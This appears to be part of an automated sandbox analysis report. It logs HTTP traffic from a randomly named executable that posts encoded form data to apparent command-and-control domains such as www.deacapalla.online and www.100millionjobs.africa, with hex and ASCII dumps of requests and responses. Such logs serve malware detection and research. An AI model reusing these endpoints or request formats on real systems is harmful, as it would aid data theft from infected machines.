                                                                                                                          Data Ascii: V8=xGV7ZAUR6HgmHUHFWpZiMV5a8PbjIIdGZVehTHIwtCLWD4GILnWZStYkmHew3p9O07i6BqB40YX/xyYRyfawTGUgXaPnhrewnMlQFtoQvVha9XtCsFOrGK2PJJDfJFt3Y8t/P05pnEWTyF8vd9su+ATOP1nFupqAPd6SjmuQVvGy54GXBKExyRN1W/lHx8IVX+2LZK/gLq2UYZMuOyO9wPd1DHSn


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          27192.168.2.550003208.91.197.27802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:43:46.216811895 CET1879OUTPOST /0pui/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.deacapalla.online
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 1239
                                                                                                                          Origin: http://www.deacapalla.online
                                                                                                                          Referer: http://www.deacapalla.online/0pui/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 78 47 56 37 5a 41 55 52 36 48 67 6d 48 55 48 46 57 70 5a 69 4d 56 35 61 38 50 62 6a 49 49 64 47 5a 56 65 68 54 48 49 77 74 43 44 57 44 4f 36 49 4c 41 43 5a 54 74 59 6b 34 33 65 39 33 70 39 54 30 37 36 2b 42 71 4e 47 30 61 66 2f 33 68 51 52 6a 65 61 77 4a 57 55 67 49 4b 50 6b 6c 72 66 74 6e 50 64 63 46 72 49 51 76 56 68 61 39 52 42 43 34 6e 32 72 64 4b 32 4d 65 35 44 74 45 6c 73 51 59 38 6b 64 50 30 30 57 6e 31 32 54 79 6c 73 76 62 50 55 75 68 51 54 4d 63 46 6d 47 75 70 57 66 50 64 4f 65 6a 6c 79 75 56 73 57 79 35 38 50 78 51 4b 55 77 76 68 55 51 47 74 30 6d 70 4a 6b 30 5a 76 71 44 5a 71 6a 59 55 61 53 36 59 4a 31 32 46 51 43 32 76 4b 5a 59 53 52 76 45 58 36 6b 65 6a 30 30 77 41 69 43 4b 74 6b 37 54 65 6e 4f 54 56 6c 59 79 59 4b 65 39 4d 52 6b 78 2f 4d 53 57 75 58 4e 45 6e 62 6d 61 36 73 4d 34 30 55 76 4e 6d 68 4b 41 4b 4b 71 6a 6e 4b 73 48 70 62 52 49 37 43 4d 6a 71 59 6e 75 75 39 57 4b 54 69 71 48 61 42 36 41 33 32 48 49 65 72 33 31 78 4f 32 37 70 75 35 71 6e 4e 68 51 6b 78 53 2f 47 75 5a [TRUNCATED]
                                                                                                                          Data Ascii: V8=xGV7ZAUR6HgmHUHFWpZiMV5a8PbjIIdGZVehTHIwtCDWDO6ILACZTtYk43e93p9T076+BqNG0af/3hQRjeawJWUgIKPklrftnPdcFrIQvVha9RBC4n2rdK2Me5DtElsQY8kdP00Wn12TylsvbPUuhQTMcFmGupWfPdOejlyuVsWy58PxQKUwvhUQGt0mpJk0ZvqDZqjYUaS6YJ12FQC2vKZYSRvEX6kej00wAiCKtk7TenOTVlYyYKe9MRkx/MSWuXNEnbma6sM40UvNmhKAKKqjnKsHpbRI7CMjqYnuu9WKTiqHaB6A32HIer31xO27pu5qnNhQkxS/GuZSAl3zSy1dunjSLRejJP1ZfbSLBVxBD3dvPYuPu5+u1mhDUzchRqmodfguvsvd3eXAE2BeKFdJL/eNDqDv+FH8Hzh+40r5EvgeSj/ePzYZ7Bs89FnHB8RiiuOAXmSBhN5WR/NTPdQGCnH1UD5+ZNdF9SekUpl0W4H5pxXnqklYVcvwbbDIsbrmljvIWdKn8VlTFt+oHvPAmeo78dw8vnUD+CUqzzhM1gjPm54qzw6EX86TOqGf0l/zi1/Fq0DRqozh3mACAJbzKpaFJypM18v8ol7hVYEHjZb/ikyifXUnJkcJ2OgidBFXBxG9jWXuaZkWu0dAnN3mJhkAUo+6QomQULx9hdq/NKKuLKn+d8zUW3gNuNHGr3RBzBspTCbuvi4F0XJqql9t1x8oxUpVfbz7gvWL9WB4DZ5VRFlUM7NBal4B5RRT2/nM6rdAmskYUK+09iFWIEX+UgqKcJsI3kCkmOGsXFpScZ/f/eo9Dzoor56A5c5dfMcgPqlDcieU9YgIFbwGrneKaQLIGa8PJKgvEudnQbaL6Z+qzRwDoePMxF92bbCLmL/ZJYLX1KD+qqg/Z0IidyEC+SIdAMGQ8nqHbLHZXso6hu32EIHbEMSJoOlA6n8P79wzoEpqkFdveZotUG2sWJmOT8be6Uwu5dCpDkwv25Ij3ettZ [TRUNCATED]


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          28192.168.2.550004208.91.197.27802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:43:48.758433104 CET580OUTGET /0pui/?V8=8E9ba00UjFo7PU/eEqgVWkIK94OcHqokbV3+SylgnD70KIDAP1aAQbV/7FCow/l5youCP7Vx0oTyvxMws++GcEtPIIait+3tzbwSXdRUlhYH624U7nSdIoyPDL7sOl16Zw==&Bb6h7=gBiPvnrHa HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.deacapalla.online
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Jan 10, 2025 16:43:49.757118940 CET1236INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 15:43:48 GMT
                                                                                                                          Server: Apache
                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                          Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                          Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                          Set-Cookie: vsid=908vr484069428992413846; expires=Wed, 09-Jan-2030 15:43:49 GMT; Max-Age=157680000; path=/; domain=www.deacapalla.online; HttpOnly
                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_DviVGobIRUXJpz5tveeqEuvUdv+VV8h8hPgtTTvR53dDRf8+22YWU39avJwY8EQ12uV9iYoSBaSIOiUMOGSPfg==
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 37 63 36 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74
                                                                                                                          Data Ascii: 7c69<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net
                                                                                                                          Jan 10, 2025 16:43:49.757150888 CET110INData Raw: 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e
                                                                                                                          Data Ascii: "> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppl
                                                                                                                          Jan 10, 2025 16:43:49.757311106 CET1236INData Raw: 69 65 73 47 6c 6f 62 61 6c 6c 79 22 20 69 6e 20 77 69 6e 64 6f 77 29 7b 77 69 6e 64 6f 77 2e 67 64 70 72 41 70 70 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 3d 74 72 75 65 7d 69 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c
                                                                                                                          Data Ascii: iesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" i
                                                                                                                          Jan 10, 2025 16:43:49.757329941 CET224INData Raw: 29 7b 72 65 74 75 72 6e 20 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 7d 76 61 72 20 67 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 73 75 70 70 6f 72 74 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66 3d
                                                                                                                          Data Ascii: ){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.inde
                                                                                                                          Jan 10, 2025 16:43:49.757340908 CET1236INData Raw: 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d 22 29 2b 38 2c 32 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 29 7d 65 6c 73 65 7b 69 66 28 65 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d 22 29 21 3d 2d 31 29 7b 63 2e 70 75 73 68 28 65 2e 73 75
                                                                                                                          Data Ascii: xOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.push(e.substr(e.indexOf("cmplang=")+8,2).toUpperCase())}else{if("cmp_setlang" in window&&window.cmp_setlang!=""){c.push(window.cmp_setlang.toUpperCase())}else{if(a.length
                                                                                                                          Jan 10, 2025 16:43:49.757356882 CET1236INData Raw: 68 2e 69 6e 64 65 78 4f 66 28 69 29 2b 73 2c 39 39 39 39 29 7d 65 6c 73 65 7b 72 65 74 75 72 6e 20 65 7d 7d 69 66 28 77 2e 69 6e 64 65 78 4f 66 28 22 26 22 29 21 3d 2d 31 29 7b 77 3d 77 2e 73 75 62 73 74 72 28 30 2c 77 2e 69 6e 64 65 78 4f 66 28
                                                                                                                          Data Ascii: h.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.indexOf("&"))}return w}var k=("cmp_proto" in h)?h.cmp_proto:"https:";if(k!="http:"&&k!="https:"){k="https:"}var g=("cmp_ref" in h)?h.cmp_ref:location.href;var j=u.create
                                                                                                                          Jan 10, 2025 16:43:49.757369995 CET1236INData Raw: 74 68 3d 3d 30 29 7b 74 3d 76 28 22 73 70 61 6e 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 69 6e 73 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 73 63 72 69 70 74 22 29 7d 69 66 28 74 2e 6c
                                                                                                                          Data Ascii: th==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}if(t.length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}var m="js";var p=x("cmpdebugunminimized","cmpdebugunminimized" in h?h.cmpdebugunminimized:0)>0?"":".mi
                                                                                                                          Jan 10, 2025 16:43:49.757383108 CET360INData Raw: 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 2c 22 2d 31 22 29 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 65 6c 73 65 7b 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 77 69 6e 64 6f 77 2e 63
                                                                                                                          Data Ascii: bute("tabindex","-1");document.body.appendChild(a)}else{window.setTimeout(window.cmp_addFrame,10,b)}}};window.cmp_rc=function(h){var b=document.cookie;var f="";var d=0;while(b!=""&&d<100){d++;while(b.substr(0,1)==" "){b=b.substr(1,b.length)}va
                                                                                                                          Jan 10, 2025 16:43:49.801924944 CET1236INData Raw: 63 3d 62 2e 73 75 62 73 74 72 28 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 2b 31 2c 62 2e 6c 65 6e 67 74 68 29 7d 69 66 28 68 3d 3d 67 29 7b 66 3d 63 7d 76 61 72 20 65 3d 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 2b 31 3b 69 66 28 65 3d 3d 30 29
                                                                                                                          Data Ascii: c=b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.substring(e,b.length)}return(f)};window.cmp_stub=function(){var a=arguments;__cmp.a=__cmp.a||[];if(!a.length){return __cmp.a}else{if(a[0]==="ping
                                                                                                                          Jan 10, 2025 16:43:49.801944017 CET1236INData Raw: 70 70 2e 6c 61 73 74 49 64 3b 5f 5f 67 70 70 2e 65 2e 70 75 73 68 28 7b 69 64 3a 63 2c 63 61 6c 6c 62 61 63 6b 3a 66 7d 29 3b 72 65 74 75 72 6e 7b 65 76 65 6e 74 4e 61 6d 65 3a 22 6c 69 73 74 65 6e 65 72 52 65 67 69 73 74 65 72 65 64 22 2c 6c 69
                                                                                                                          Data Ascii: pp.lastId;__gpp.e.push({id:c,callback:f});return{eventName:"listenerRegistered",listenerId:c,data:true,pingData:window.cmp_gpp_ping()}}else{if(g==="removeEventListener"){var h=false;__gpp.e=__gpp.e||[];for(var d=0;d<__gpp.e.length;d++){if(__gp
                                                                                                                          Jan 10, 2025 16:43:49.801956892 CET1236INData Raw: 28 74 79 70 65 6f 66 28 63 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 63 21 3d 3d 6e 75 6c 6c 26 26 22 5f 5f 74 63 66 61 70 69 43 61 6c 6c 22 20 69 6e 20 63 29 7b 76 61 72 20 62 3d 63 2e 5f 5f 74 63 66 61 70 69 43 61 6c 6c 3b 77 69 6e 64 6f 77 2e
                                                                                                                          Data Ascii: (typeof(c)==="object"&&c!==null&&"__tcfapiCall" in c){var b=c.__tcfapiCall;window.__tcfapi(b.command,b.version,function(h,g){var e={__tcfapiReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},b.pa


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          29192.168.2.550005136.243.64.147802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:43:55.045595884 CET854OUTPOST /tw42/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.100millionjobs.africa
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 203
                                                                                                                          Origin: http://www.100millionjobs.africa
                                                                                                                          Referer: http://www.100millionjobs.africa/tw42/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 6f 72 42 68 77 7a 58 42 61 32 69 69 53 6c 31 65 4d 33 76 56 53 38 79 54 4d 59 37 2b 4c 73 62 55 5a 74 30 41 34 43 61 56 2b 68 4d 68 39 74 54 4a 2b 7a 2f 64 42 77 78 66 44 68 49 55 6b 74 2b 43 37 69 39 79 6d 32 5a 43 30 53 34 6d 57 56 5a 61 42 4f 67 31 52 39 52 70 4c 6a 69 45 77 6f 41 6b 32 37 73 30 43 30 30 2f 57 34 53 64 42 56 37 75 4a 59 72 37 71 52 35 41 62 35 71 33 44 32 62 59 31 41 6a 35 57 5a 4e 74 78 2f 55 32 33 46 79 52 73 7a 39 46 6d 63 54 43 68 62 49 30 68 32 4c 58 64 44 63 66 4c 6d 33 72 75 4e 53 77 37 4c 6d 59 63 5a 4d 49 41 57 70 69 46 79 34 59 31 64 35 50 63 4a 61 4b 44 56 51 3d
                                                                                                                          Data Ascii: V8=orBhwzXBa2iiSl1eM3vVS8yTMY7+LsbUZt0A4CaV+hMh9tTJ+z/dBwxfDhIUkt+C7i9ym2ZC0S4mWVZaBOg1R9RpLjiEwoAk27s0C00/W4SdBV7uJYr7qR5Ab5q3D2bY1Aj5WZNtx/U23FyRsz9FmcTChbI0h2LXdDcfLm3ruNSw7LmYcZMIAWpiFy4Y1d5PcJaKDVQ=
                                                                                                                          Jan 10, 2025 16:43:55.713295937 CET493INHTTP/1.1 302 Found
                                                                                                                          Date: Fri, 10 Jan 2025 15:43:55 GMT
                                                                                                                          Server: Apache
                                                                                                                          Location: http://maximumgroup.co.za/tw42/
                                                                                                                          Content-Length: 290
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 74 77 34 32 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/tw42/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          30192.168.2.550006136.243.64.147802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:43:57.594106913 CET874OUTPOST /tw42/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.100millionjobs.africa
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 223
                                                                                                                          Origin: http://www.100millionjobs.africa
                                                                                                                          Referer: http://www.100millionjobs.africa/tw42/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 6f 72 42 68 77 7a 58 42 61 32 69 69 51 48 68 65 41 30 33 56 54 63 79 63 51 6f 37 2b 42 4d 62 51 5a 71 38 41 34 41 32 6a 69 45 55 68 39 4a 66 4a 2f 79 2f 64 41 77 78 66 4e 42 49 4e 70 4e 2b 5a 37 69 78 51 6d 79 5a 43 30 52 45 6d 57 55 70 61 41 39 49 36 44 64 52 72 4b 54 69 52 75 59 41 6b 32 37 73 30 43 77 6c 55 57 34 4b 64 43 6c 72 75 4a 36 54 36 30 68 34 79 4d 4a 71 33 56 47 62 63 31 41 6a 62 57 59 52 58 78 36 59 32 33 46 43 52 74 6e 52 47 2f 4d 54 41 6c 62 4a 52 76 57 57 66 54 69 45 75 44 32 36 74 75 72 53 73 7a 64 58 79 47 37 45 67 54 32 46 61 56 68 77 76 6b 74 59 6d 47 71 4b 36 64 43 48 74 76 57 4a 45 35 68 6b 41 6e 50 4a 58 42 62 71 72 33 30 61 38
                                                                                                                          Data Ascii: V8=orBhwzXBa2iiQHheA03VTcycQo7+BMbQZq8A4A2jiEUh9JfJ/y/dAwxfNBINpN+Z7ixQmyZC0REmWUpaA9I6DdRrKTiRuYAk27s0CwlUW4KdClruJ6T60h4yMJq3VGbc1AjbWYRXx6Y23FCRtnRG/MTAlbJRvWWfTiEuD26turSszdXyG7EgT2FaVhwvktYmGqK6dCHtvWJE5hkAnPJXBbqr30a8
                                                                                                                          Jan 10, 2025 16:43:58.233299971 CET493INHTTP/1.1 302 Found
                                                                                                                          Date: Fri, 10 Jan 2025 15:43:58 GMT
                                                                                                                          Server: Apache
                                                                                                                          Location: http://maximumgroup.co.za/tw42/
                                                                                                                          Content-Length: 290
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 74 77 34 32 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/tw42/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          31192.168.2.550007136.243.64.147802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:44:00.135642052 CET1891OUTPOST /tw42/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.100millionjobs.africa
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 1239
                                                                                                                          Origin: http://www.100millionjobs.africa
                                                                                                                          Referer: http://www.100millionjobs.africa/tw42/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 6f 72 42 68 77 7a 58 42 61 32 69 69 51 48 68 65 41 30 33 56 54 63 79 63 51 6f 37 2b 42 4d 62 51 5a 71 38 41 34 41 32 6a 69 45 63 68 39 36 58 4a 2f 52 6e 64 53 67 78 66 53 78 49 49 70 4e 2b 59 37 68 42 55 6d 7a 6b 35 30 55 49 6d 55 33 78 61 4a 6f 30 36 61 74 52 72 50 6a 69 46 77 6f 41 31 32 37 63 34 43 30 35 55 57 34 4b 64 43 6e 6a 75 41 49 72 36 32 68 35 41 62 35 71 37 44 32 61 4c 31 41 36 73 57 59 6b 31 78 70 51 32 33 6c 53 52 68 30 70 47 67 63 54 4f 6f 37 4a 7a 76 57 61 51 54 69 70 58 44 32 4f 4c 75 73 65 73 69 4c 44 78 44 34 4d 2f 41 58 78 38 57 51 49 43 6d 71 30 6c 4f 4b 61 77 62 31 6a 4e 6d 45 64 6b 76 56 6b 69 68 2b 6f 72 55 36 53 6a 38 67 72 4a 54 33 4d 2b 39 58 31 48 4d 71 56 54 78 77 6e 2f 33 72 4b 4f 4e 6b 73 6c 47 5a 45 59 46 38 4e 6f 6a 6a 50 65 7a 74 46 61 30 38 57 2b 34 6d 69 43 67 36 58 30 57 6d 73 6f 70 35 39 36 50 6b 5a 6b 6a 42 41 68 42 57 51 4c 69 53 69 77 67 77 58 62 4b 32 4b 37 79 34 67 59 59 53 6d 53 4d 46 44 52 45 36 72 6c 63 48 48 76 4b 79 4c 6f 36 79 49 63 55 50 50 [TRUNCATED]
